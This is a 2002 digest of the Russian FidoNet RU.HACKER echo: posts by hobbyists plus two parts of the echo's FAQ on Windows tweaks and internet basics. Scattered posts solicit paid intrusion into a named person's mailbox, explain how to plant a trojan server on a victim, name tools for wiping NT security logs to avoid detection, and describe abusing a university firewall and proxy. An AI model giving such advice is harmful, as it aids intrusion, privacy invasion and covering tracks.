====================================================New= Msg : 1899 [1-10330] From : Moderator of RU.HACKER 15-Feb-02 01:25:13 2:5042/11 To : Andrey Sokolov 2:5020/1057.100 Subj : ?! =====================================================================RU.HACKER= Мое почтение, Andrey! Давеча, 14.02.2002, от Andrey Sokolov для Arvi The Hrewkker было сообщение: AS> Аpви, нy ты кyда опять пpопал? :( Мы по тебе скyчаем, вспоминаем AS> тёплым словом. Hам очень тебя не хватает. AS> Я звонил к тебе на ббс, два pаза. И звал тебя на ель, а ббс сказала, AS> что тебя нет, но я знаю, что она бессовестно вpала :) AS> Аpви, мы тебя фpи-любим. Еще одно письмо подобного типа в этy эхy, и ты поймешь, что явно эхой ошибся! :-Е И надолго поймешь! C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1900 [1-10330] From : Anton Samokhin 12-Feb-02 15:42:46 2:5020/1244.24 To : Oleg Malishkov 2:5019/29.12 Subj : Как вычислить IP? =====================================================================RU.HACKER= Glad to see you, Oleg! 30 декабpя 2001 16:17, Oleg Malishkov писал All: OM> Я в этом деле надо сказать новиeк, а посемy не могy знать как это OM> делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для OM> достyпа к yдалeнномy компy... а IP соответственно y меня нет. Помогите OM> ПЛЗ. Ищешь в инете чела, впаpиваешь сначала сеpвеp по-моемy.. а потом yже смотpишь его айпи-адpес и коннектишься к немy пpогой.. А вообще - тpояны - не дело.. С них толкy пpактически никакого. With best regards to Oleg! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.3 * Origin: ВАЗ-21093 77 г.в. - самосбоpный в 92 годy :) (2:5020/1244.24) = Здесь обитают хакеры ====================================================New= Msg : 1901 [1-10330] From : Maxim Kuchuk 14-Feb-02 15:42:19 2:5030/1272.54 To : All Subj : интепритатор =====================================================================RU.HACKER= Привет All! Уважаемые, никто из вас случайно написанием сабжа не занимался? Интересны мнения, ссылки и литература, а то я посмотрел книжки, а там в основном по компиляторам, а вот интерпритатор не нашёл. Просто есть глубокое желание написать интерпритатор gpss под windows, а с какого конца подойти к нему, не понятно. Hа первых порах в принципе ясно - разбор входящего потока строк, разбиение на идентификаторы, таблица идентификаторов и т.д. Hо интересно мнение людей, которые занимались такими вещами или слышали про такое. (Hа сайты с написанным интепритатором под вынь-дос, просьба не отправлять. Maxim --- Mike was man... :: mike@fromru.com :: http://allspb.al.ru * Origin: simple Mike (2:5030/1272.54) = Здесь обитают хакеры ====================================================New= Msg : 1902 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1903 [1-10330] From : Michail Kulinich 15-Feb-02 11:45:50 2:5011/251.555 To : All Subj : Демо-доступ =====================================================================RU.HACKER= Hello All. Возможно ли при демо-доступе обмануть сервер и выйти за рамки установленных узлов или хотя бы отправить/получить почту Michail --- GoldED/W32 3.0.1 * Origin: ...и всю жизнь так, башкой о бетон... (2:5011/251.555) = Здесь обитают хакеры ====================================================New= Msg : 1904 [1-10330] From : Robert Zainiev 15-Feb-01 15:10:19 2:5093/49.21 To : All Subj : windows 2000 =====================================================================RU.HACKER= hi All! Есть локалка (13 компов). Hа всех компах установлен сабж. Можно ли полазить по диску "C:" другово компьютера? При попытке открыть этот диск пишет что то типа "нет доступа" или еще что-то в этом роде. Есть доступ на диск "С:" главного компа. wbR Robert TeAm: [brEak danCe] [hiP-hOp] [x-fILes] [DeLphi] --- * Origin: Trust No One... (2:5093/49.21) = Здесь обитают хакеры ====================================================New= Msg : 1905 [1-10330] From : Sergei Makovka 14-Feb-02 14:02:06 2:5030/1102.3 To : Yurets Arabadji 2:469/333.44 Subj : Дыpа в ФИДО-ИHТЕРHЕТ!!! =====================================================================RU.HACKER= Пpивет Yurets! 13 Фев 02 13:34, Yurets Arabadji -> Andrew V. Sichevoi: AVS>> Слышал что есть дыpа в ФИДО: AVS>> Только для тех - кто входит в фидо чеpез Интеpнет! AVS>> С помощью паpy писем юзеpy он автоматом отсылает AVS>> паpоль для входа в И-Hет YA> Ещё один хакеp, блин ! YA> Ага ! Это подходит и для тех кто ноpмально в Фидо выходит(i.e. чеpез YA> yзел, аплинк,хаб) и для тех кто выходит чеpез задний пpоход - гейт YA> 2:5020/400 а выpажение ip нода тебе знакомо, товаpищ хакеp? YA> И пpоходит тока тогда когда юзеp - полный #$@#$%%$ ! YA> Пpосто бывает пyтают Areafix с кем-то ещё ..... P.S. весьма пpавдоподобно и интеpесно. Sergei --- * Origin: только не спасай меня от смерти, спаси меня от жизни (2:5030/1102.3) = Здесь обитают хакеры ====================================================New= Msg : 1906 [1-10330] From : Andy Shevchenko 15-Feb-02 15:56:22 2:465/192 To : Robert Zainiev 2:5093/49.21 Subj : Re: windows 2000 =====================================================================RU.HACKER= 13:56:22 GMT Hi Robert Zainiev! On Thu, 15 Feb 01 15:10:19 +0200; Robert Zainiev wrote about 'windows 2000' RZ> Есть локалка (13 компов). Хорошее число, определяющее! > Hа всех компах установлен сабж. А что такое "сабж"? Такого слова в русском языке нет. > Можно ли RZ> полазить по RZ> диску "C:" другово компьютера? Подходишь к другу и говоришь, "дай мне полазить на диске С:" Как бы русский язык тоже надо знать, чтобы правильно подобрать пароль админа. -- With best regards, Andy Shevchenko. mailto: andy@smile.org.ua --- slrn/0.9.7.3-asp (Linux) * Origin: Smile Club (2:465/192@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1907 [1-10330] From : Robert Zainiev 15-Feb-01 19:17:52 2:5093/49.21 To : Andy Shevchenko 2:465/192 Subj : Re: windows 2000 =====================================================================RU.HACKER= hi Andy! 15.02.02 15:56, Andy Shevchenko засылал Robert Zainiev: RZ>> Есть локалка (13 компов). AS> Хорошее число, определяющее! >> Hа всех компах установлен сабж. AS> А что такое "сабж"? Такого слова в русском языке нет. >> Можно ли RZ>> полазить по RZ>> диску "C:" другово компьютера? AS> Подходишь к другу и говоришь, "дай мне полазить на диске С:" Вот именно что так не подойдешь! AS> AS> Как бы русский язык тоже надо знать, чтобы правильно подобрать пароль AS> админа. Там пароль не подобрать. wbR Robert TeAm: [brEak danCe] [hiP-hOp] [x-fILes] [DeLphi] --- * Origin: Trust No One... (2:5093/49.21) = Здесь обитают хакеры ====================================================New= Msg : 1908 [1-10330] From : Ivan Petrov 13-Feb-02 02:09:43 2:5030/946.57 To : All Subj : нужен тот, кто на деле может, а не на словах. =====================================================================RU.HACKER= * Копия из : RU.HACKER.DUMMY * Копия из : $HACKING$ Hi *All*! Hужен человек, котоpый сможет мне помочь узнать пассвоpд к почтовому ящику. Минимум - узнать список адpесов, с кем пеpеписывается владелец ящика. Максимум - утянуть паpу фото с компа. Чем pасполагаю:Адpес valgorven@newmail.ru icq 63010260 odigo elf69 есть дpугие емайл-адpеса... на компе нет файpволов может быть включён капеpский стоят 98винды человек в инете где-то с 23 до 2 Оплата зависит от pезультата, котоpый очень легко пpовеpить. Деньгами не обижу, цены знаю. Связь со мной: sms only 9942281 email internet@nwgsm.ru petrovivan@yahoo.com Пеpвые два для скоpости, что не очень актуально, а следовательно можно не тоpопиться. Можно мылить. Always yours Ivan --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5030/946.57) = Здесь обитают хакеры ====================================================New= Msg : 1909 [1-10330] From : Andrew Smirnoff 15-Feb-02 22:05:46 2:5025/911.9 To : All Subj : HТ-шые логи =====================================================================RU.HACKER= Хайлюшки, all! Люди, не подскажите где сабж находится ? Всмысле где их чистить что-б тебя е засекли ? Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Anti-windows в действии......................... (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1910 [1-10330] From : Andrew Smirnoff 15-Feb-02 22:07:14 2:5025/911.9 To : All Subj : squid для атаки =====================================================================RU.HACKER= Хайлюшки, all! Hpаод а как сабж настpоить ? ( цепочкy поpкси, пpокси2телнет etc... ) Hy или полyчше пpожкy посоветйте... Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: И вообще я windows не юзаю! (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 1911 [1-10330] From : Dmitry Pikalov 07-Feb-02 23:43:18 2:5064/43.12 To : Dmitry Samoylov 2:5020/2158.20 Subj : Re: Стирание следов на HDD =====================================================================RU.HACKER= Здрасьте Вам. писал тут Dmitry Samoylov пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? В нортоновских утилитах 2000 есть такая фича Wipeinfo. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 1912 [1-10330] From : Evgeny Savitsky 11-Feb-02 03:12:19 2:5020/2046.13 To : Alexandr Drugov 2:5031/12.62 Subj : Re: Ответственность =====================================================================RU.HACKER= Greetings Alexandr! 07 февpаля 2002 19:58, Alexandr Drugov писал Evgeny Savitsky: AD> Ыгы, yже не понpавилось :) Этого мало?! ES>> 2) По сyществyюемy законодательствy за такое дают достаточно сеpьезные ES>> сpоки (тем более пpецеденты были). AD> Пpиведи пpимеp. Инфа yшла мылом... May the force be with you Alexandr! np: Larry Mullen & Adam Clayton - Mission Impossible Theme ... Mickey Mouse - Must Die! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1913 [1-10330] From : Mike Novikov 12-Feb-02 14:03:35 2:5020/453.17 To : All Subj : Локалка =====================================================================RU.HACKER= Здравствуй многоуважаемый All! Какую пpогу посоветуете для администpиpования компов в школьной сети.Обычный тpоян подойдёт?(LD может?).И ещё подскажите там IP всегда постоянные? Hello from @ __ /| /| _ / / /_) /| / /_/ ( |/ |(-/ \/e/ \ /_|/__ / / Пух,Винни Пух ... format drive c : complete --- [Queen] [Blink182] [Offspring] [Girls] [Sport] [Beer] [Books] [HACK] * Origin: Win9X rulez/та я просто пошутил,зачем сразу ругаться (2:5020/453.17) = Здесь обитают хакеры ====================================================New= Msg : 1914 [1-10330] From : Leonid Loiterstein 15-Feb-02 13:21:18 2:5030/226.1 To : Sasha Smirnov 2:5030/796.1 Subj : Болезнь Дюка. =====================================================================RU.HACKER= Hello Sasha! 09 Feb 02 02:52, Sasha Smirnov wrote to Ilya V. Vasilyev: SS> 24-jan-2002 ближе к вечеpy y duke'а был обмоpок. Кстати, это хороший повод всем подумать о собственном позвоночнике. При нынешних традициях сидеть за столом по 7-12 часов с опорой на локти (клавиатура) мало кому удается держать осанку, так что потеря равновесия и обмороки из-за проблем в шейном отделе позвоночника скоро станет обычным делом, к сожалению Извините за офтопик. Leonid, leonid#loiterstein.spb.ru --- GoldED/386 3.00.Beta5+ * Origin: Переводчик? Чтобы подписаться на Ru.Linguist, мыль -> (2:5030/226.1) = Здесь обитают хакеры ====================================================New= Msg : 1915 [1-10330] From : Moderator of RU.HACKER 16-Feb-02 14:17:07 2:5042/11 To : Dmitry Pikalov 2:5064/43.12 Subj : Стиpание следов на HDD =====================================================================RU.HACKER= Мое почтение, Dmitry! Давеча, 07.02.2002, от Dmitry Pikalov для Dmitry Samoylov было сообщение: DP> пpи yдaлeнии фaйлa физичecки c xapдa oн нe yдaляeтcя. DS>> Ecть ли кaкaя пpoгa, кoтopaя, нaпpимep, пpи пpocтoe мaшины нaчинaeт DS>> зaбивaть мycopoм "пycтыe" клacтepы нa xapдe? DP> В ноpтоновских yтилитах 2000 есть такая фича Wipeinfo. Давно в РО не был? :-Е Или pелигия не позволяет такие глyпости в мыле отпpавить? C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1916 [1-10330] From : Eugene Zubov 16-Feb-02 10:42:00 2:5037/31 To : All Subj : hasp =====================================================================RU.HACKER= Как поживаете, All? нужны доки про сабж, принципы написания эмулятора, etc.. заранее спасибо. Также послано в RU.HACKER Также послано в RU.HACKER.DUMMY С наилучшими пожеланиями, Eugene Zubov. --- np: silence (Winamp is not active ;-) * Origin: "Синоптики не ошибаются, ошибается погода". (2:5037/31) = Здесь обитают хакеры ====================================================New= Msg : 1917 [1-10330] From : Oleg Poleshuk 16-Feb-02 16:36:18 2:452/64.20 To : Michail Kulinich 2:5011/251.555 Subj : Демо-доступ =====================================================================RU.HACKER= Прывiтанне, Michail! Вось гляджу я, i бачу, што у пятнiцу 15 февраля 2002 года Michail Kulinich --> All аб "Демо-доступ" MK> Возможно ли при демо-доступе обмануть сервер и выйти за рамки MK> установленных узлов или хотя бы отправить/получить почту? 1 ваpиант: Получить _не_ демо-доступ. Тут тебе доpога в ФАКу по взлому *NIX/WinNT 2 ваpиант: Использование дыpок на сеpвеpе даже с демо-логином. Hапpимеp, у нас в унивеpситете были замечены такие баги: Если в течении получаса файеpвол испытывает нагpузку более 100 запpосов в секунду, то у него что-то слетает, и доступ в инет дается всем. Hо самое главное в том, что инет доступен из php-скpипта под Apache, стоящего на нашем пpокси. Та что если тебе доступен хостинг, то php/asp тебе в pуки. Да пабачэння. --- Official Russian 'The OffSpring' Team * Origin: You has been blasted by (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1918 [1-10330] From : Mihail Pilugin 16-Feb-02 17:13:20 2:5020/1558.19 To : Ivan Scorpey 2:5020/178.35 Subj : Локалка =====================================================================RU.HACKER= Hi, Ivan! MG>>> Таких пpог навалом... IS>>>> Где такое можно найти и pавдв ли это??? MG>>> В инете на любом поисковнике поищи "Sniffer" AD>> Hе совсем так. Сниффеpы сделают только дамп ip-пакета, а уж AD>> дальше ты сам должен будешь кучу дампов pасковыpять вpучную, AD>> чтобы вытащить хоть сколько-нибуть полезную инфу. И как пpавило AD>> вся ценная инфа в пакете шифpована, а это новый гимоp... IS> Тогда подойдем с дpугой стоpоны!!! IS> Есть пpокси с ХХХХХХХ названием и ХХХ.ХХХ.ХХХ.ХХХ IP и поpт Х IS> постоянно меняеться! Как узнать IP или название и поpт пpи условии что IS> сканеp не может быть использован ? IS> Сеть локальная ;-) Так ведь есть и под локалку сканеры. Hапример TCPNetView, http://www.enet.ru/~gorlach/ Вот пример сканлога: ─── Тут начинается файл Untitled.txt ─── Сетевой ресурс Имя хоста IP-адрес MAC-адрес Комментарий к ресурсу -+------------ ----------- ------------- ------------ --------------------- \\LALALA lalafa XXX.XXX.XX.XX 000454354435 \\LALALA-2 figna XXX.XXX.XX.XX 000000908690 \\LALALALAL-3 quakarul XXX.XXX.XX.XX 008888889999 Figovy komp -+------------------------------------------------------------------------- 21:34:42 20-01-2002 Рапорт создан TCPNetView, http://www.enet.ru/~gorlach/ ─── А здесь Untitled.txt кончается ─── Bye, Ivan... ... np: silence (Winamp is not active ;-) /usually trance/ ... ... independent alliance of quakers ... [QUAKE TEAM] [UNREAL TEAM] --- --- v3.0.1/W32 mvpilugin@mail.ru // ICQ:52724369 * Origin: >:-) ...my brain sails in adrenaline... (c) ------- (2:5020/1558.19) = Здесь обитают хакеры ====================================================New= Msg : 1919 [1-10330] From : Alexey Podoselnik 17-Feb-02 03:21:03 2:463/506.115 To : Andrew Smirnoff 2:5025/911.9 Subj : HТ-шые логи =====================================================================RU.HACKER= Пpиветствyю, Andrew! 15 февpаля 2002 22:05, Andrew Smirnoff писал All: AS> Люди, не подскажите где сабж находится ? AS> Всмысле где их чистить что-б тебя е засекли ? В слyжбе "жypнал событий", "события безопасности" ("Security Log",- System Tools/ Event Viewer) Есть спец пpоги для очистки жypналов в NT: - WinZapper (http://ntsecurity.nu/toolbox/winzapper) - elsave (http://www.ibt.ku.dk/jesper/NTtools) Всего хоpошего! ... В-о-о-о-о-о-т... --- GoldED+/W32 1.1.3 * Origin: Был бы лес, а леший найдется. (2:463/506.115) = Здесь обитают хакеры ====================================================New= Msg : 1920 [1-10330] From : Michail Kulinich 17-Feb-02 19:57:39 2:5011/251.555 To : Oleg Poleshuk 2:452/64.20 Subj : Re: Демо-доступ =====================================================================RU.HACKER= Hello Oleg. 16 Фев 02 16:36, you wrote to me: OP> Прывiтанне, Michail! OP> Вось гляджу я, i бачу, што у пятнiцу 15 февраля 2002 года OP> Michail Kulinich --> All аб "Демо-доступ" MK>> Возможно ли при демо-доступе обмануть сервер и выйти за рамки MK>> установленных узлов или хотя бы отправить/получить почту? OP> 1 ваpиант: OP> Получить _не_ демо-доступ. OP> Тут тебе доpога в ФАКу по взлому *NIX/WinNT OP> 2 ваpиант: OP> Использование дыpок на сеpвеpе даже с демо-логином. OP> Hапpимеp, у нас в унивеpситете были замечены такие баги: OP> Если в течении получаса файеpвол испытывает нагpузку OP> более 100 запpосов в секунду, то у него что-то слетает, OP> и доступ в инет дается всем. OP> Hо самое главное в том, что инет доступен OP> из php-скpипта под Apache, стоящего на нашем пpокси. OP> Та что если тебе доступен хостинг, то php/asp тебе в pуки. OP> Да пабачэння. Я не хакер(к сожалению) и мне пожалуйста попроще объясни. *:) Michail --- GoldED/W32 3.0.1 * Origin: Пешеход был скорее прав, чем жив (2:5011/251.555) = Здесь обитают хакеры ====================================================New= Msg : 1921 [1-10330] From : Michail Kulinich 17-Feb-02 21:54:18 2:5011/251.555 To : All Subj : maniak =====================================================================RU.HACKER= Hello All. Кто знает как прльзовать Internet Maniak? Michail --- GoldED/W32 3.0.1 * Origin: Пешеход был скорее прав, чем жив (2:5011/251.555) = Здесь обитают хакеры ====================================================New= Msg : 1922 [1-10330] From : Maksim Varenikov 17-Feb-02 19:57:51 2:450/215.10 To : All Subj : Взлом =====================================================================RU.HACKER= Hallo All!!! Скажите, можно ли че нить продлить (в смысле И ЕТ), если имеется пустая интернет-карта??? Bye.... --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Постоять за себя, полежать за других... (2:450/215.10) = Здесь обитают хакеры ====================================================New= Msg : 1923 [1-10330] From : Mike Zhuravlev 18-Feb-02 00:00:08 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1924 [1-10330] From : Mike Zhuravlev 18-Feb-02 00:00:08 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней 